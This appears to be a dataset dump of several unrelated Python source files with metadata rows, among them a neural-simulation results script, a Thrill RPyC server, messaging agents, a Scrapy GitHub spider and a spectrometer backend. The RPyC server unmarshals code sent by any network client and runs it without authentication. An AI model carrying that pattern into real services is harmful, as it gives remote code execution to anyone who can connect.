Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
VIPtuning_afterreward = get_tuning_avgoverperiod(
VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
VIPtuning_final = get_tuning_avgoverperiod(VIP_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
SOMtuning_initial = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
upto=p.nonplasticwarmup_simtime)
SOMtuning_afterwarmup = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
SOMtuning_duringreward = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime -
p.nonplasticwarmup_simtime,
upto=total_warmup_simtime + p.reward_simtime)
SOMtuning_afterreward = get_tuning_avgoverperiod(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_warmup_simtime + p.reward_simtime +
p.nonplasticwarmup_simtime)
SOMtuning_final = get_tuning_avgoverperiod(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime -
p.after_simtime,
upto=total_simtime)
PYRData_reward = get_spiketrains_foreachstim(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
PYRData = get_spiketrains_foreachstim(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
SSTData_reward = get_spiketrains_foreachstim(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
SSTData = get_spiketrains_foreachstim(SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
PVData_reward = get_spiketrains_foreachstim(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime,
upto=total_warmup_simtime +
p.reward_simtime)
PVData = get_spiketrains_foreachstim(PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=0 * second,
upto=total_simtime)
PYRData_afterreward = get_spiketrains_foreachstim(
PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
SSTData_afterreward = get_spiketrains_foreachstim(
SOM_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
PVData_afterreward = get_spiketrains_foreachstim(
PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
try:
currentratio_initial, currentratiomean_initial, ampE_initial, ampI_initial, amp2Ei, amp2Ii, amp3Ei, amp3Ii = get_currentratio_foreachstim(
currents,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
currentratio_final, currentratiomean_final, ampE_final, ampI_final, amp2Ef, amp2If, amp3Ef, amp3If = get_currentratio_foreachstim(
currents,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime - p.after_simtime,
upto=total_simtime)
except:
currentratio_initial = []
currentratiomean_initial = []
ampE_initial = []
ampI_initial = []
amp2Ei = []
amp2Ii = []
amp3Ei = []
amp3Ii = []
currentratio_final = []
currentratiomean_final = []
ampE_final = []
ampI_final = []
amp2Ef = []
amp2If = []
amp3Ef = []
amp3If = []
results = {
'impact': impact,
'impact_aftereward': impactmax_afterreward,
'impactmax': impact,
'impactmax_aftereward': impactmax_afterreward,
'SOM0PV': SOM0PV.w,
'SOMotherPV': SOMotherPV.w,
'weights_rec': con_REC.w[:],
'weights_rec_afterwarmup': conREC_afterwarmup,
'weights_rec_afterreward': conREC_afterreward,
'weights_rec_start': conREC_start,
'weights_rec_i': con_REC.i[:],
'weights_rec_j': con_REC.j[:],
'weights_sst_pv': con_SOM_PV.w[:],
'weights_sst_pv_afterwarmup': sstpv_w_afterwarmup,
'weights_sst_pv_afterreward': sstpv_w_afterreward,
'stimtuning_initial': stimtuning_initial,
'stimtuning_final': stimtuning_final,
'stimPVtuning_initial': stimPVtuning_initial,
'stimPVtuning_final': stimPVtuning_final,
't': PYR1.t[:],
'tuning_initial': tuning_initial,
'tuning_final': tuning_final,
'tuning_afterwarmup': tuning_afterwarmup,
'tuning_rewardend': tuning_duringreward,
'tuning_after_rewardend': tuning_afterreward,
'PVtuning_initial': PVtuning_initial,
'PVtuning_final': PVtuning_final,
'PVtuning_afterwarmup': PVtuning_afterwarmup,
'PVtuning_rewardend': PVtuning_duringreward,
'PVtuning_after_rewardend': PVtuning_afterreward,
'VIPtuning_initial': VIPtuning_initial,
'VIPtuning_final': VIPtuning_final,
'VIPtuning_afterwarmup': VIPtuning_afterwarmup,
'VIPtuning_rewardend': VIPtuning_duringreward,
'VIPtuning_after_rewardend': VIPtuning_afterreward,
'SOMtuning_initial': SOMtuning_initial,
'SOMtuning_final': SOMtuning_final,
'SOMtuning_rewardend': SOMtuning_duringreward,
'SOMtuning_after_rewardend': SOMtuning_afterreward,
'SOMPV_t': monSOMPV.t[:],
'SOMPV_w': monSOMPV.w[:],
'PYRPV_w': monPYRPV.w[:],
'PYRVIP_w': monPYRVIP.w[:],
'PVPYR_w': monPVPYR.w[:],
'PVPV_w': monPVPV.w[:],
'PVSOM_w': monPVSOM.w[:],
'PVVIP_w': monPVVIP.w[:],
'VIPSOM_w': monVIPSOM.w[:],
'VIPPYR_w': monVIPPYR.w[:],
'VIPPV_w': monVIPPV.w[:],
'VIPVIP_w': monVIPVIP.w[:],
'SOMVIP_w': monSOMVIP.w[:],
'SOMPYR_w': monSOMPYR.w[:],
'SOMSOM_w': monSOMSOM.w[:],
'PYRSOM1_w': monPYRSOM1.w[:],
'PYRSOM2_w': monPYRSOM2.w[:],
'PYRSOM3_w': monPYRSOM3.w[:],
'PYRSOM4_w': monPYRSOM4.w[:],
'currentratio_initial': currentratio_initial,
'currentratio_final': currentratio_final,
'PYR0toothers': mona.w,
'otherstoPYR0': monb.w,
'PYR1toothers': monc.w,
'PYR2toothers': mond.w,
'PYR3toothers': mone.w,
'PYRi': PYRi[:],
'PYRt': PYRt[:],
'SSTi': SSTi[:],
'SSTt': SSTt[:],
'PVi': PVi[:],
'PVt': PVt[:],
'VIPi': VIPi[:],
'VIPt': VIPt[:],
'PYRData0_reward': PYRData_reward['0'],
'PYRData1_reward': PYRData_reward['1'],
'PVData_reward': PVData_reward['0'],
'PVData1_reward': PVData_reward['1'],
'SSTData_reward': SSTData_reward['0'],
'SSTData1_reward': SSTData_reward['1'],
'PYRData0': PYRData_afterreward['0'],
'PYRData1': PYRData_afterreward['1'],
'PVData0': PVData_afterreward['0'],
'PVData1': PVData_afterreward['1'],
'SSTData0': SSTData_afterreward['0'],
'SSTData1': SSTData_afterreward['1'],
'PYRDataAll0': PYRData['0'],
'PYRDataAll1': PYRData['1'],
'PYRDataAll2': PYRData['2'],
'PYRDataAll3': PYRData['3'],
'SSTDataAll0': SSTData['0'],
'SSTDataAll1': SSTData['1'],
'SSTDataAll2': SSTData['2'],
'SSTDataAll3': SSTData['3'],
'PVDataAll0': PVData['0'],
'PVDataAll1': PVData['1'],
'PVDataAll2': PVData['2'],
'PVDataAll3': PVData['3'],
'Pyr1rate': PYR1.smooth_rate(window='flat', width=0.5 * ms),
'Pyr2rate': PYR2.smooth_rate(window='flat', width=0.5 * ms),
'Pyr3rate': PYR3.smooth_rate(window='flat', width=0.5 * ms),
'Pyr4rate': PYR4.smooth_rate(window='flat', width=0.5 * ms),
'SOM1rate': SOM1.smooth_rate(window='flat', width=0.5 * ms),
'SOM2rate': SOM2.smooth_rate(window='flat', width=0.5 * ms),
'SOM3rate': SOM3.smooth_rate(window='flat', width=0.5 * ms),
'SOM4rate': SOM4.smooth_rate(window='flat', width=0.5 * ms),
'PVrate': PVmon.smooth_rate(window='flat', width=0.5 * ms),
}
results_file = f'./results/results_tuned{TUNED_ORI}_2.pkl'
print("Saving results to:", results_file)
with open(results_file, 'wb') as f:
pickle.dump(results, f) | true | true |
1c304fd07c92b9666cc4f024f111acb314da5bd6 | 2,529 | py | Python | frontends/swig_python/python_rpyc_server.py | stevenybw/thrill | a2dc05035f4e24f64af0a22b60155e80843a5ba9 | [
"BSD-2-Clause"
] | 609 | 2015-08-27T11:09:24.000Z | 2022-03-28T21:34:05.000Z | frontends/swig_python/python_rpyc_server.py | tim3z/thrill | f0e5aa2326a55af3c9a92fc418f8eb8e3cf8c5fa | [
"BSD-2-Clause"
] | 109 | 2015-09-10T21:34:42.000Z | 2022-02-15T14:46:26.000Z | frontends/swig_python/python_rpyc_server.py | tim3z/thrill | f0e5aa2326a55af3c9a92fc418f8eb8e3cf8c5fa | [
"BSD-2-Clause"
] | 114 | 2015-08-27T14:54:13.000Z | 2021-12-08T07:28:35.000Z | #!/usr/bin/env python
##########################################################################
# frontends/swig_python/python_rpyc_server.py
#
# Part of Project Thrill - http://project-thrill.org
#
# Copyright (C) 2015 Timo Bingmann <tb@panthema.net>
#
# All rights reserved. Published under the BSD-2 license in the LICENSE file.
##########################################################################
import sys
import marshal
import types
import rpyc
import thrill
class RpcDIA():
def __init__(self, dia):
self._dia = dia
def AllGather(self):
return self._dia.AllGather()
def Size(self):
return self._dia.Size()
def Map(self, map_function):
code1 = marshal.loads(map_function)
func1 = types.FunctionType(code1, globals())
return RpcDIA(self._dia.Map(func1))
def ReduceBy(self, key_extractor, reduce_function):
code1 = marshal.loads(key_extractor)
func1 = types.FunctionType(code1, globals())
code2 = marshal.loads(reduce_function)
func2 = types.FunctionType(code2, globals())
return RpcDIA(self._dia.ReduceBy(func1, func2))
class RpcContext():
def __init__(self, host_ctx, my_host_rank):
self._ctx = thrill.PyContext(host_ctx, my_host_rank)
def Generate(self, generator_function, size):
code1 = marshal.loads(generator_function)
function1 = types.FunctionType(code1, globals())
return RpcDIA(self._ctx.Generate(function1, size))
def Distribute(self, array):
return RpcDIA(self._ctx.Distribute(array))
class MyService(rpyc.Service):
def on_connect(self):
# code that runs when a connection is created
# (to init the serivce, if needed)
print("hello client")
pass
def on_disconnect(self):
# code that runs when the connection has already closed
# (to finalize the service, if needed)
print("client disconnected")
pass
def exposed_Create(self, my_host_rank, endpoints):
print("Creating thrill context for rank",
my_host_rank, "endpoints", endpoints)
host_ctx = thrill.HostContext(my_host_rank, endpoints, 1)
return RpcContext(host_ctx, 0)
if __name__ == "__main__":
from rpyc.utils.server import ThreadedServer
t = ThreadedServer(MyService, port=int(sys.argv[1]),
protocol_config={"allow_public_attrs": True})
t.start()
##########################################################################
| 30.107143 | 77 | 0.608936 | true | true | |
1c30502cf2a178c2357083e71e9e94f53d3bb7bf | 7,654 | py | Python | infdist/optimization/agent.py | zeroos/infdist | 5fca2c42bbe5ea650866a26568d1eaf240b2b47e | [
"MIT"
] | null | null | null | infdist/optimization/agent.py | zeroos/infdist | 5fca2c42bbe5ea650866a26568d1eaf240b2b47e | [
"MIT"
] | null | null | null | infdist/optimization/agent.py | zeroos/infdist | 5fca2c42bbe5ea650866a26568d1eaf240b2b47e | [
"MIT"
] | null | null | null | from copy import copy, deepcopy
from itertools import islice
import random
from .dynamic_message_tree import DynamicMessageTree
from .dynamic_models import DynamicMessageSet
from .models import MessageSet
from .message_forecast import MessageForecast
class BaseAgent:
ACT_DROP = 0
ACT_SEND = 1
ACT_NO_DECISION = -1
def __init__(self, ident, net, messages_context, now_func):
self.ident = ident
self.received_messages = MessageSet(0)
self.sent_messages = MessageSet(0)
self.generated_messages = MessageSet(0)
self.net = net
self.messages_context = messages_context
self.now_func = now_func
def gen_message_received_callback(self):
def message_received(message):
self.received(message)
return message_received
def send(self, native_message, message):
assert message.sender == self.ident
self.net.send(native_message)
message.t_sent = self.now_func()
self.register_sent(message)
def generated(self, native_message):
message = self.net.deserialize(native_message)
self.register_generated(message)
result = self.process_message(message)
if result == self.ACT_SEND:
self.send(native_message, message)
elif result != self.ACT_DROP:
raise Exception(f"Unknown action {result}")
def process_message(self, m):
raise NotImplementedError()
def received(self, native_message):
message = self.net.deserialize(native_message)
self.register_received(message)
def register_generated(self, message):
self.generated_messages.append(message)
def register_sent(self, message):
self.sent_messages.append(message)
def register_received(self, message):
self.received_messages.append(message)
def gen_generate_message_callback(self, m):
def _generate_message():
self.generated(m)
return _generate_message
def finish_mission(self, t):
self.received_messages.t_end = t
class FullCommAgent(BaseAgent):
"""
This agent sends all messages.
"""
def process_message(self, m):
return self.ACT_SEND
class FixedRatioAgent(BaseAgent):
"""
Agent that randomly drops messages with a predefined probability.
"""
def __init__(self, *args, **kwargs):
self.drop_ratio = kwargs.pop('drop_ratio', 0.5)
super().__init__(*args, **kwargs)
def process_message(self, m):
if random.random() > self.drop_ratio:
return self.ACT_SEND
return self.ACT_DROP
class ConstrainedAgent(BaseAgent):
"""
A base class for all agents implementing constraints.
"""
def __init__(self, *args, **kwargs):
self.constraints = kwargs.pop('constraints')
super().__init__(*args, **kwargs)
def process_message(self, message):
for constraint in self.constraints.values():
constraint.update_model(
self.received_messages + self.sent_messages, self.now_func()
)
return self.ACT_NO_DECISION
class GreedyConstrainedAgent(ConstrainedAgent):
"""
A greedy agent that tries to maintain constraint.
Keep in mind that no predictions are being made about what other agents
are sending, so it is very likely that the constraint is not maintained.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def process_message(self, message):
super().process_message(message)
est_sent_message = copy(message)
est_sent_message.t_sent = self.now_func()
all_messages = self.received_messages + self.sent_messages
all_messages.append(est_sent_message)
messages = DynamicMessageSet()
messages = messages.add_messageset(all_messages)
for constraint in self.constraints.values():
if constraint(
messages, True
):
return self.ACT_DROP
return self.ACT_SEND
class BaseTreeAgent(ConstrainedAgent):
"""
Base class for agents implementing a decision tree.
"""
DEFAULT_T_END = 10
def __init__(self, *args, **kwargs):
self.agents = kwargs.pop('agents')
self.simulations_num = kwargs.pop('simulations_num', 1500)
limit_history = kwargs.pop('limit_history', 0)
suppress_warnings = kwargs.pop('suppress_warnings', False)
super().__init__(*args, **kwargs)
self.tree = DynamicMessageTree(
self.DEFAULT_T_END,
self.messages_context,
self.constraints,
)
self.tree.limit_history = limit_history
self.tree.suppress_warnings = suppress_warnings
self.active = True
def process_message(self, message):
super().process_message(message)
if not self.active:
return self.ACT_DROP
self.tree.progress_time(message.t_gen)
est_sent_message = copy(message)
est_sent_message.t_sent = self.now_func()
if self.tree.decide(est_sent_message, self.simulations_num):
return self.ACT_SEND
# print("DROPPING")
return self.ACT_DROP
def register_sent(self, message):
super().register_sent(message)
message_copy = copy(message)
self.tree.register_message(message_copy)
def register_received(self, message):
super().register_received(message)
message_copy = copy(message)
message_copy.receivers = (
set(self.agents.keys()) - set([message_copy.sender])
)
self.tree.register_message(message_copy)
latency = self.now_func() - message.t_gen
self.tree.latency = latency
class FullKnowledgeAgent(BaseTreeAgent):
"""
A decision tree-based agent knowing all messages that are going to be
exchanged in the system.
"""
def __init__(self, *args, **kwargs):
all_messages = kwargs.pop('all_messages')
super().__init__(*args, **kwargs)
self.all_messages = all_messages
def process_message(self, message):
self.tree.update_future(deepcopy(self.all_messages))
return super().process_message(message)
class EstimatingAgent(BaseTreeAgent):
"""
A decision tree-based agent that estimates the messages to be exchanged
by other agents.
The estimation is made by MessageForecast class based on the mission
context.
"""
def __init__(self, *args, **kwargs):
self.window_size = kwargs.pop('window_size')
self.future_messages_num = kwargs.pop('future_messages_num', 30)
super().__init__(*args, **kwargs)
self.forecast = MessageForecast(self.messages_context)
def register_sent(self, message):
super().register_sent(message)
self.forecast.register(message)
def register_received(self, message):
super().register_received(message)
if message.t_rcv is None:
message.t_rcv = self.now_func()
self.forecast.register(message)
def process_message(self, message):
future_generator = self.forecast.message_generator(
message.t_gen-min(
self.tree.pessymistic_latency,
self.window_size
),
[message],
)
self.tree.update_future(
MessageSet(
t_end=self.forecast.estimate_t_end(),
messages=list(
islice(future_generator, self.future_messages_num)
)
)
)
return super().process_message(message)
| 31.240816 | 76 | 0.651555 | from copy import copy, deepcopy
from itertools import islice
import random
from .dynamic_message_tree import DynamicMessageTree
from .dynamic_models import DynamicMessageSet
from .models import MessageSet
from .message_forecast import MessageForecast
class BaseAgent:
ACT_DROP = 0
ACT_SEND = 1
ACT_NO_DECISION = -1
def __init__(self, ident, net, messages_context, now_func):
self.ident = ident
self.received_messages = MessageSet(0)
self.sent_messages = MessageSet(0)
self.generated_messages = MessageSet(0)
self.net = net
self.messages_context = messages_context
self.now_func = now_func
def gen_message_received_callback(self):
def message_received(message):
self.received(message)
return message_received
def send(self, native_message, message):
assert message.sender == self.ident
self.net.send(native_message)
message.t_sent = self.now_func()
self.register_sent(message)
def generated(self, native_message):
message = self.net.deserialize(native_message)
self.register_generated(message)
result = self.process_message(message)
if result == self.ACT_SEND:
self.send(native_message, message)
elif result != self.ACT_DROP:
raise Exception(f"Unknown action {result}")
def process_message(self, m):
raise NotImplementedError()
def received(self, native_message):
message = self.net.deserialize(native_message)
self.register_received(message)
def register_generated(self, message):
self.generated_messages.append(message)
def register_sent(self, message):
self.sent_messages.append(message)
def register_received(self, message):
self.received_messages.append(message)
def gen_generate_message_callback(self, m):
def _generate_message():
self.generated(m)
return _generate_message
def finish_mission(self, t):
self.received_messages.t_end = t
class FullCommAgent(BaseAgent):
def process_message(self, m):
return self.ACT_SEND
class FixedRatioAgent(BaseAgent):
def __init__(self, *args, **kwargs):
self.drop_ratio = kwargs.pop('drop_ratio', 0.5)
super().__init__(*args, **kwargs)
def process_message(self, m):
if random.random() > self.drop_ratio:
return self.ACT_SEND
return self.ACT_DROP
class ConstrainedAgent(BaseAgent):
def __init__(self, *args, **kwargs):
self.constraints = kwargs.pop('constraints')
super().__init__(*args, **kwargs)
def process_message(self, message):
for constraint in self.constraints.values():
constraint.update_model(
self.received_messages + self.sent_messages, self.now_func()
)
return self.ACT_NO_DECISION
class GreedyConstrainedAgent(ConstrainedAgent):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def process_message(self, message):
super().process_message(message)
est_sent_message = copy(message)
est_sent_message.t_sent = self.now_func()
all_messages = self.received_messages + self.sent_messages
all_messages.append(est_sent_message)
messages = DynamicMessageSet()
messages = messages.add_messageset(all_messages)
for constraint in self.constraints.values():
if constraint(
messages, True
):
return self.ACT_DROP
return self.ACT_SEND
class BaseTreeAgent(ConstrainedAgent):
DEFAULT_T_END = 10
def __init__(self, *args, **kwargs):
self.agents = kwargs.pop('agents')
self.simulations_num = kwargs.pop('simulations_num', 1500)
limit_history = kwargs.pop('limit_history', 0)
suppress_warnings = kwargs.pop('suppress_warnings', False)
super().__init__(*args, **kwargs)
self.tree = DynamicMessageTree(
self.DEFAULT_T_END,
self.messages_context,
self.constraints,
)
self.tree.limit_history = limit_history
self.tree.suppress_warnings = suppress_warnings
self.active = True
def process_message(self, message):
super().process_message(message)
if not self.active:
return self.ACT_DROP
self.tree.progress_time(message.t_gen)
est_sent_message = copy(message)
est_sent_message.t_sent = self.now_func()
if self.tree.decide(est_sent_message, self.simulations_num):
return self.ACT_SEND
return self.ACT_DROP
def register_sent(self, message):
super().register_sent(message)
message_copy = copy(message)
self.tree.register_message(message_copy)
def register_received(self, message):
super().register_received(message)
message_copy = copy(message)
message_copy.receivers = (
set(self.agents.keys()) - set([message_copy.sender])
)
self.tree.register_message(message_copy)
latency = self.now_func() - message.t_gen
self.tree.latency = latency
class FullKnowledgeAgent(BaseTreeAgent):
def __init__(self, *args, **kwargs):
all_messages = kwargs.pop('all_messages')
super().__init__(*args, **kwargs)
self.all_messages = all_messages
def process_message(self, message):
self.tree.update_future(deepcopy(self.all_messages))
return super().process_message(message)
class EstimatingAgent(BaseTreeAgent):
def __init__(self, *args, **kwargs):
self.window_size = kwargs.pop('window_size')
self.future_messages_num = kwargs.pop('future_messages_num', 30)
super().__init__(*args, **kwargs)
self.forecast = MessageForecast(self.messages_context)
def register_sent(self, message):
super().register_sent(message)
self.forecast.register(message)
def register_received(self, message):
super().register_received(message)
if message.t_rcv is None:
message.t_rcv = self.now_func()
self.forecast.register(message)
def process_message(self, message):
future_generator = self.forecast.message_generator(
message.t_gen-min(
self.tree.pessymistic_latency,
self.window_size
),
[message],
)
self.tree.update_future(
MessageSet(
t_end=self.forecast.estimate_t_end(),
messages=list(
islice(future_generator, self.future_messages_num)
)
)
)
return super().process_message(message)
| true | true |
1c30507f3356bafbdd5cc8cce338dc9c571a00a8 | 461 | py | Python | soane/comms/list.py | spheten/soane | b5517275b8b3fd3b2b5a19b031c98cfd45d42292 | [
"BSD-3-Clause"
] | 1 | 2021-10-03T07:13:55.000Z | 2021-10-03T07:13:55.000Z | soane/comms/list.py | spheten/soane | b5517275b8b3fd3b2b5a19b031c98cfd45d42292 | [
"BSD-3-Clause"
] | 14 | 2021-10-03T07:10:10.000Z | 2021-10-06T09:07:41.000Z | soane/comms/list.py | spheten/soane | b5517275b8b3fd3b2b5a19b031c98cfd45d42292 | [
"BSD-3-Clause"
] | null | null | null | '''
Command definition for 'list'.
'''
import click
from soane.comms._base import group
@group.command(
name = 'list',
short_help = 'List notes.',
add_help_option = False,
)
@click.argument('glob',
default = '*',
required = False,
)
@click.help_option('-h', '--help')
@click.pass_obj
def list_(book, glob):
'''
List all notes or notes matching GLOB.
'''
for note in book.match(glob):
click.echo(note.name)
| 17.074074 | 42 | 0.609544 |
import click
from soane.comms._base import group
@group.command(
name = 'list',
short_help = 'List notes.',
add_help_option = False,
)
@click.argument('glob',
default = '*',
required = False,
)
@click.help_option('-h', '--help')
@click.pass_obj
def list_(book, glob):
for note in book.match(glob):
click.echo(note.name)
| true | true |
1c30508127e48ea49a1c38482226cef7e7506fd2 | 2,257 | py | Python | docs/conf.py | atviriduomenys/spinta | 77a10e201f8cdc63143fce7996fd0898acb1ff58 | [
"MIT"
] | 2 | 2019-03-14T06:41:14.000Z | 2019-03-26T11:48:14.000Z | docs/conf.py | sirex/spinta | 77a10e201f8cdc63143fce7996fd0898acb1ff58 | [
"MIT"
] | 44 | 2019-04-05T15:52:45.000Z | 2022-03-30T07:41:33.000Z | docs/conf.py | sirex/spinta | 77a10e201f8cdc63143fce7996fd0898acb1ff58 | [
"MIT"
] | 1 | 2019-04-01T09:54:27.000Z | 2019-04-01T09:54:27.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Spinta'
copyright = '2020-2021, Spinta Team'
author = 'Spinta Team'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '.venv']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
master_doc = 'index'
autodoc_typehints = 'description'
| 33.686567 | 79 | 0.675233 |
project = 'Spinta'
copyright = '2020-2021, Spinta Team'
author = 'Spinta Team'
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
]
templates_path = ['_templates']
language = 'en'
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '.venv']
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
master_doc = 'index'
autodoc_typehints = 'description'
| true | true |
1c3050b2b610afa08db98f5f49804dd345368fdb | 1,038 | py | Python | Answers/week1-challenge-05/shiyanlou/spiders/github.py | ruoshengyuan/louplus-dm | f1cdcc5b7447536a40c8ffee442437fb269b2c75 | [
"MIT"
] | null | null | null | Answers/week1-challenge-05/shiyanlou/spiders/github.py | ruoshengyuan/louplus-dm | f1cdcc5b7447536a40c8ffee442437fb269b2c75 | [
"MIT"
] | null | null | null | Answers/week1-challenge-05/shiyanlou/spiders/github.py | ruoshengyuan/louplus-dm | f1cdcc5b7447536a40c8ffee442437fb269b2c75 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import scrapy
from shiyanlou.items import ShiyanlouItem
class GithubSpider(scrapy.Spider):
name = 'github'
allowed_domains = ['github.com']
@property
def start_urls(self):
url_temp = 'https://github.com/shiyanlou?after={}&tab=repositories'
# 此参考会失效,请自行重新手动复制 after 参数
after = [
'',
'Y3Vyc29yOnYyOpK5MjAxNy0wNi0wN1QwNjoxOTo1NyswODowMM4FkpYw',
'Y3Vyc29yOnYyOpK5MjAxNS0wMS0yNVQxMTozMTowNyswODowMM4Bxrsx',
'Y3Vyc29yOnYyOpK5MjAxNC0xMS0yMFQxMzowMzo1MiswODowMM4BjkvL',
]
return (url_temp.format(i) for i in after) # 1-4 页
def parse(self, response):
repos = response.xpath('//li[@itemprop="owns"]')
for repo in repos:
item = ShiyanlouItem()
item['repo_name'] = repo.xpath(".//a[@itemprop='name codeRepository']/text()").extract_first().strip()
item['update_time'] = repo.xpath(".//relative-time/@datetime").extract_first()
yield item | 35.793103 | 114 | 0.624277 |
import scrapy
from shiyanlou.items import ShiyanlouItem
class GithubSpider(scrapy.Spider):
name = 'github'
allowed_domains = ['github.com']
@property
def start_urls(self):
url_temp = 'https://github.com/shiyanlou?after={}&tab=repositories'
after = [
'',
'Y3Vyc29yOnYyOpK5MjAxNy0wNi0wN1QwNjoxOTo1NyswODowMM4FkpYw',
'Y3Vyc29yOnYyOpK5MjAxNS0wMS0yNVQxMTozMTowNyswODowMM4Bxrsx',
'Y3Vyc29yOnYyOpK5MjAxNC0xMS0yMFQxMzowMzo1MiswODowMM4BjkvL',
]
return (url_temp.format(i) for i in after)
def parse(self, response):
repos = response.xpath('//li[@itemprop="owns"]')
for repo in repos:
item = ShiyanlouItem()
item['repo_name'] = repo.xpath(".//a[@itemprop='name codeRepository']/text()").extract_first().strip()
item['update_time'] = repo.xpath(".//relative-time/@datetime").extract_first()
yield item | true | true |
1c305105c9b9faa649ccbbdfd85ec89e21d7b263 | 1,537 | py | Python | src/spectrabuster/backends/seatease.py | eduardosprp/spectrabuster | bb75c2bc860fd5ade7414b212e63113e6fa22eab | [
"MIT"
] | null | null | null | src/spectrabuster/backends/seatease.py | eduardosprp/spectrabuster | bb75c2bc860fd5ade7414b212e63113e6fa22eab | [
"MIT"
] | 1 | 2020-11-14T16:04:23.000Z | 2020-11-14T16:04:23.000Z | src/spectrabuster/backends/seatease.py | eduardosprp/spectrabuster | bb75c2bc860fd5ade7414b212e63113e6fa22eab | [
"MIT"
] | 3 | 2020-11-14T03:27:09.000Z | 2022-01-14T09:25:22.000Z | from seatease.spectrometers import Spectrometer, list_devices
from time import sleep
features = {
"measure": True,
"correct_nl": False,
"correct_dc": False,
"temperature": False,
"int_time_limits": True,
"sat_intensity": True,
}
class Device(object):
# {{{
def __init__(self, device_obj=None, **kwargs):
# Yes, I am aware that having a self._device inside the
# Device class can be somewhat confusing
if device_obj is None:
self._device = Spectrometer(list_devices()[0])
else:
self._device = Spectrometer(device_obj)
def measure(self, **kwargs):
correct_nl = kwargs["correct_nl"] if "correct_nl" in kwargs else False
correct_dc = kwargs["correct_dc"] if "correct_dc" in kwargs else False
return self._device.intensities(correct_dc, correct_nl)
def wavelengths(self, **kwargs):
return self._device.wavelengths()
def set_int_time(self, int_time, sleep_time=0, **kwargs):
self._device.integration_time_micros(int_time)
# This is to account for the delay involved in changing
# the spectrometer's integration time
sleep(sleep_time)
@property
def int_time_limits(self):
return self._device.integration_time_micros_limits
@property
def sat_intensity(self):
return self._device.max_intensity
# }}}
def devices():
return list_devices()
def first_available_device():
return Device()
def get_name(self):
return "seatease"
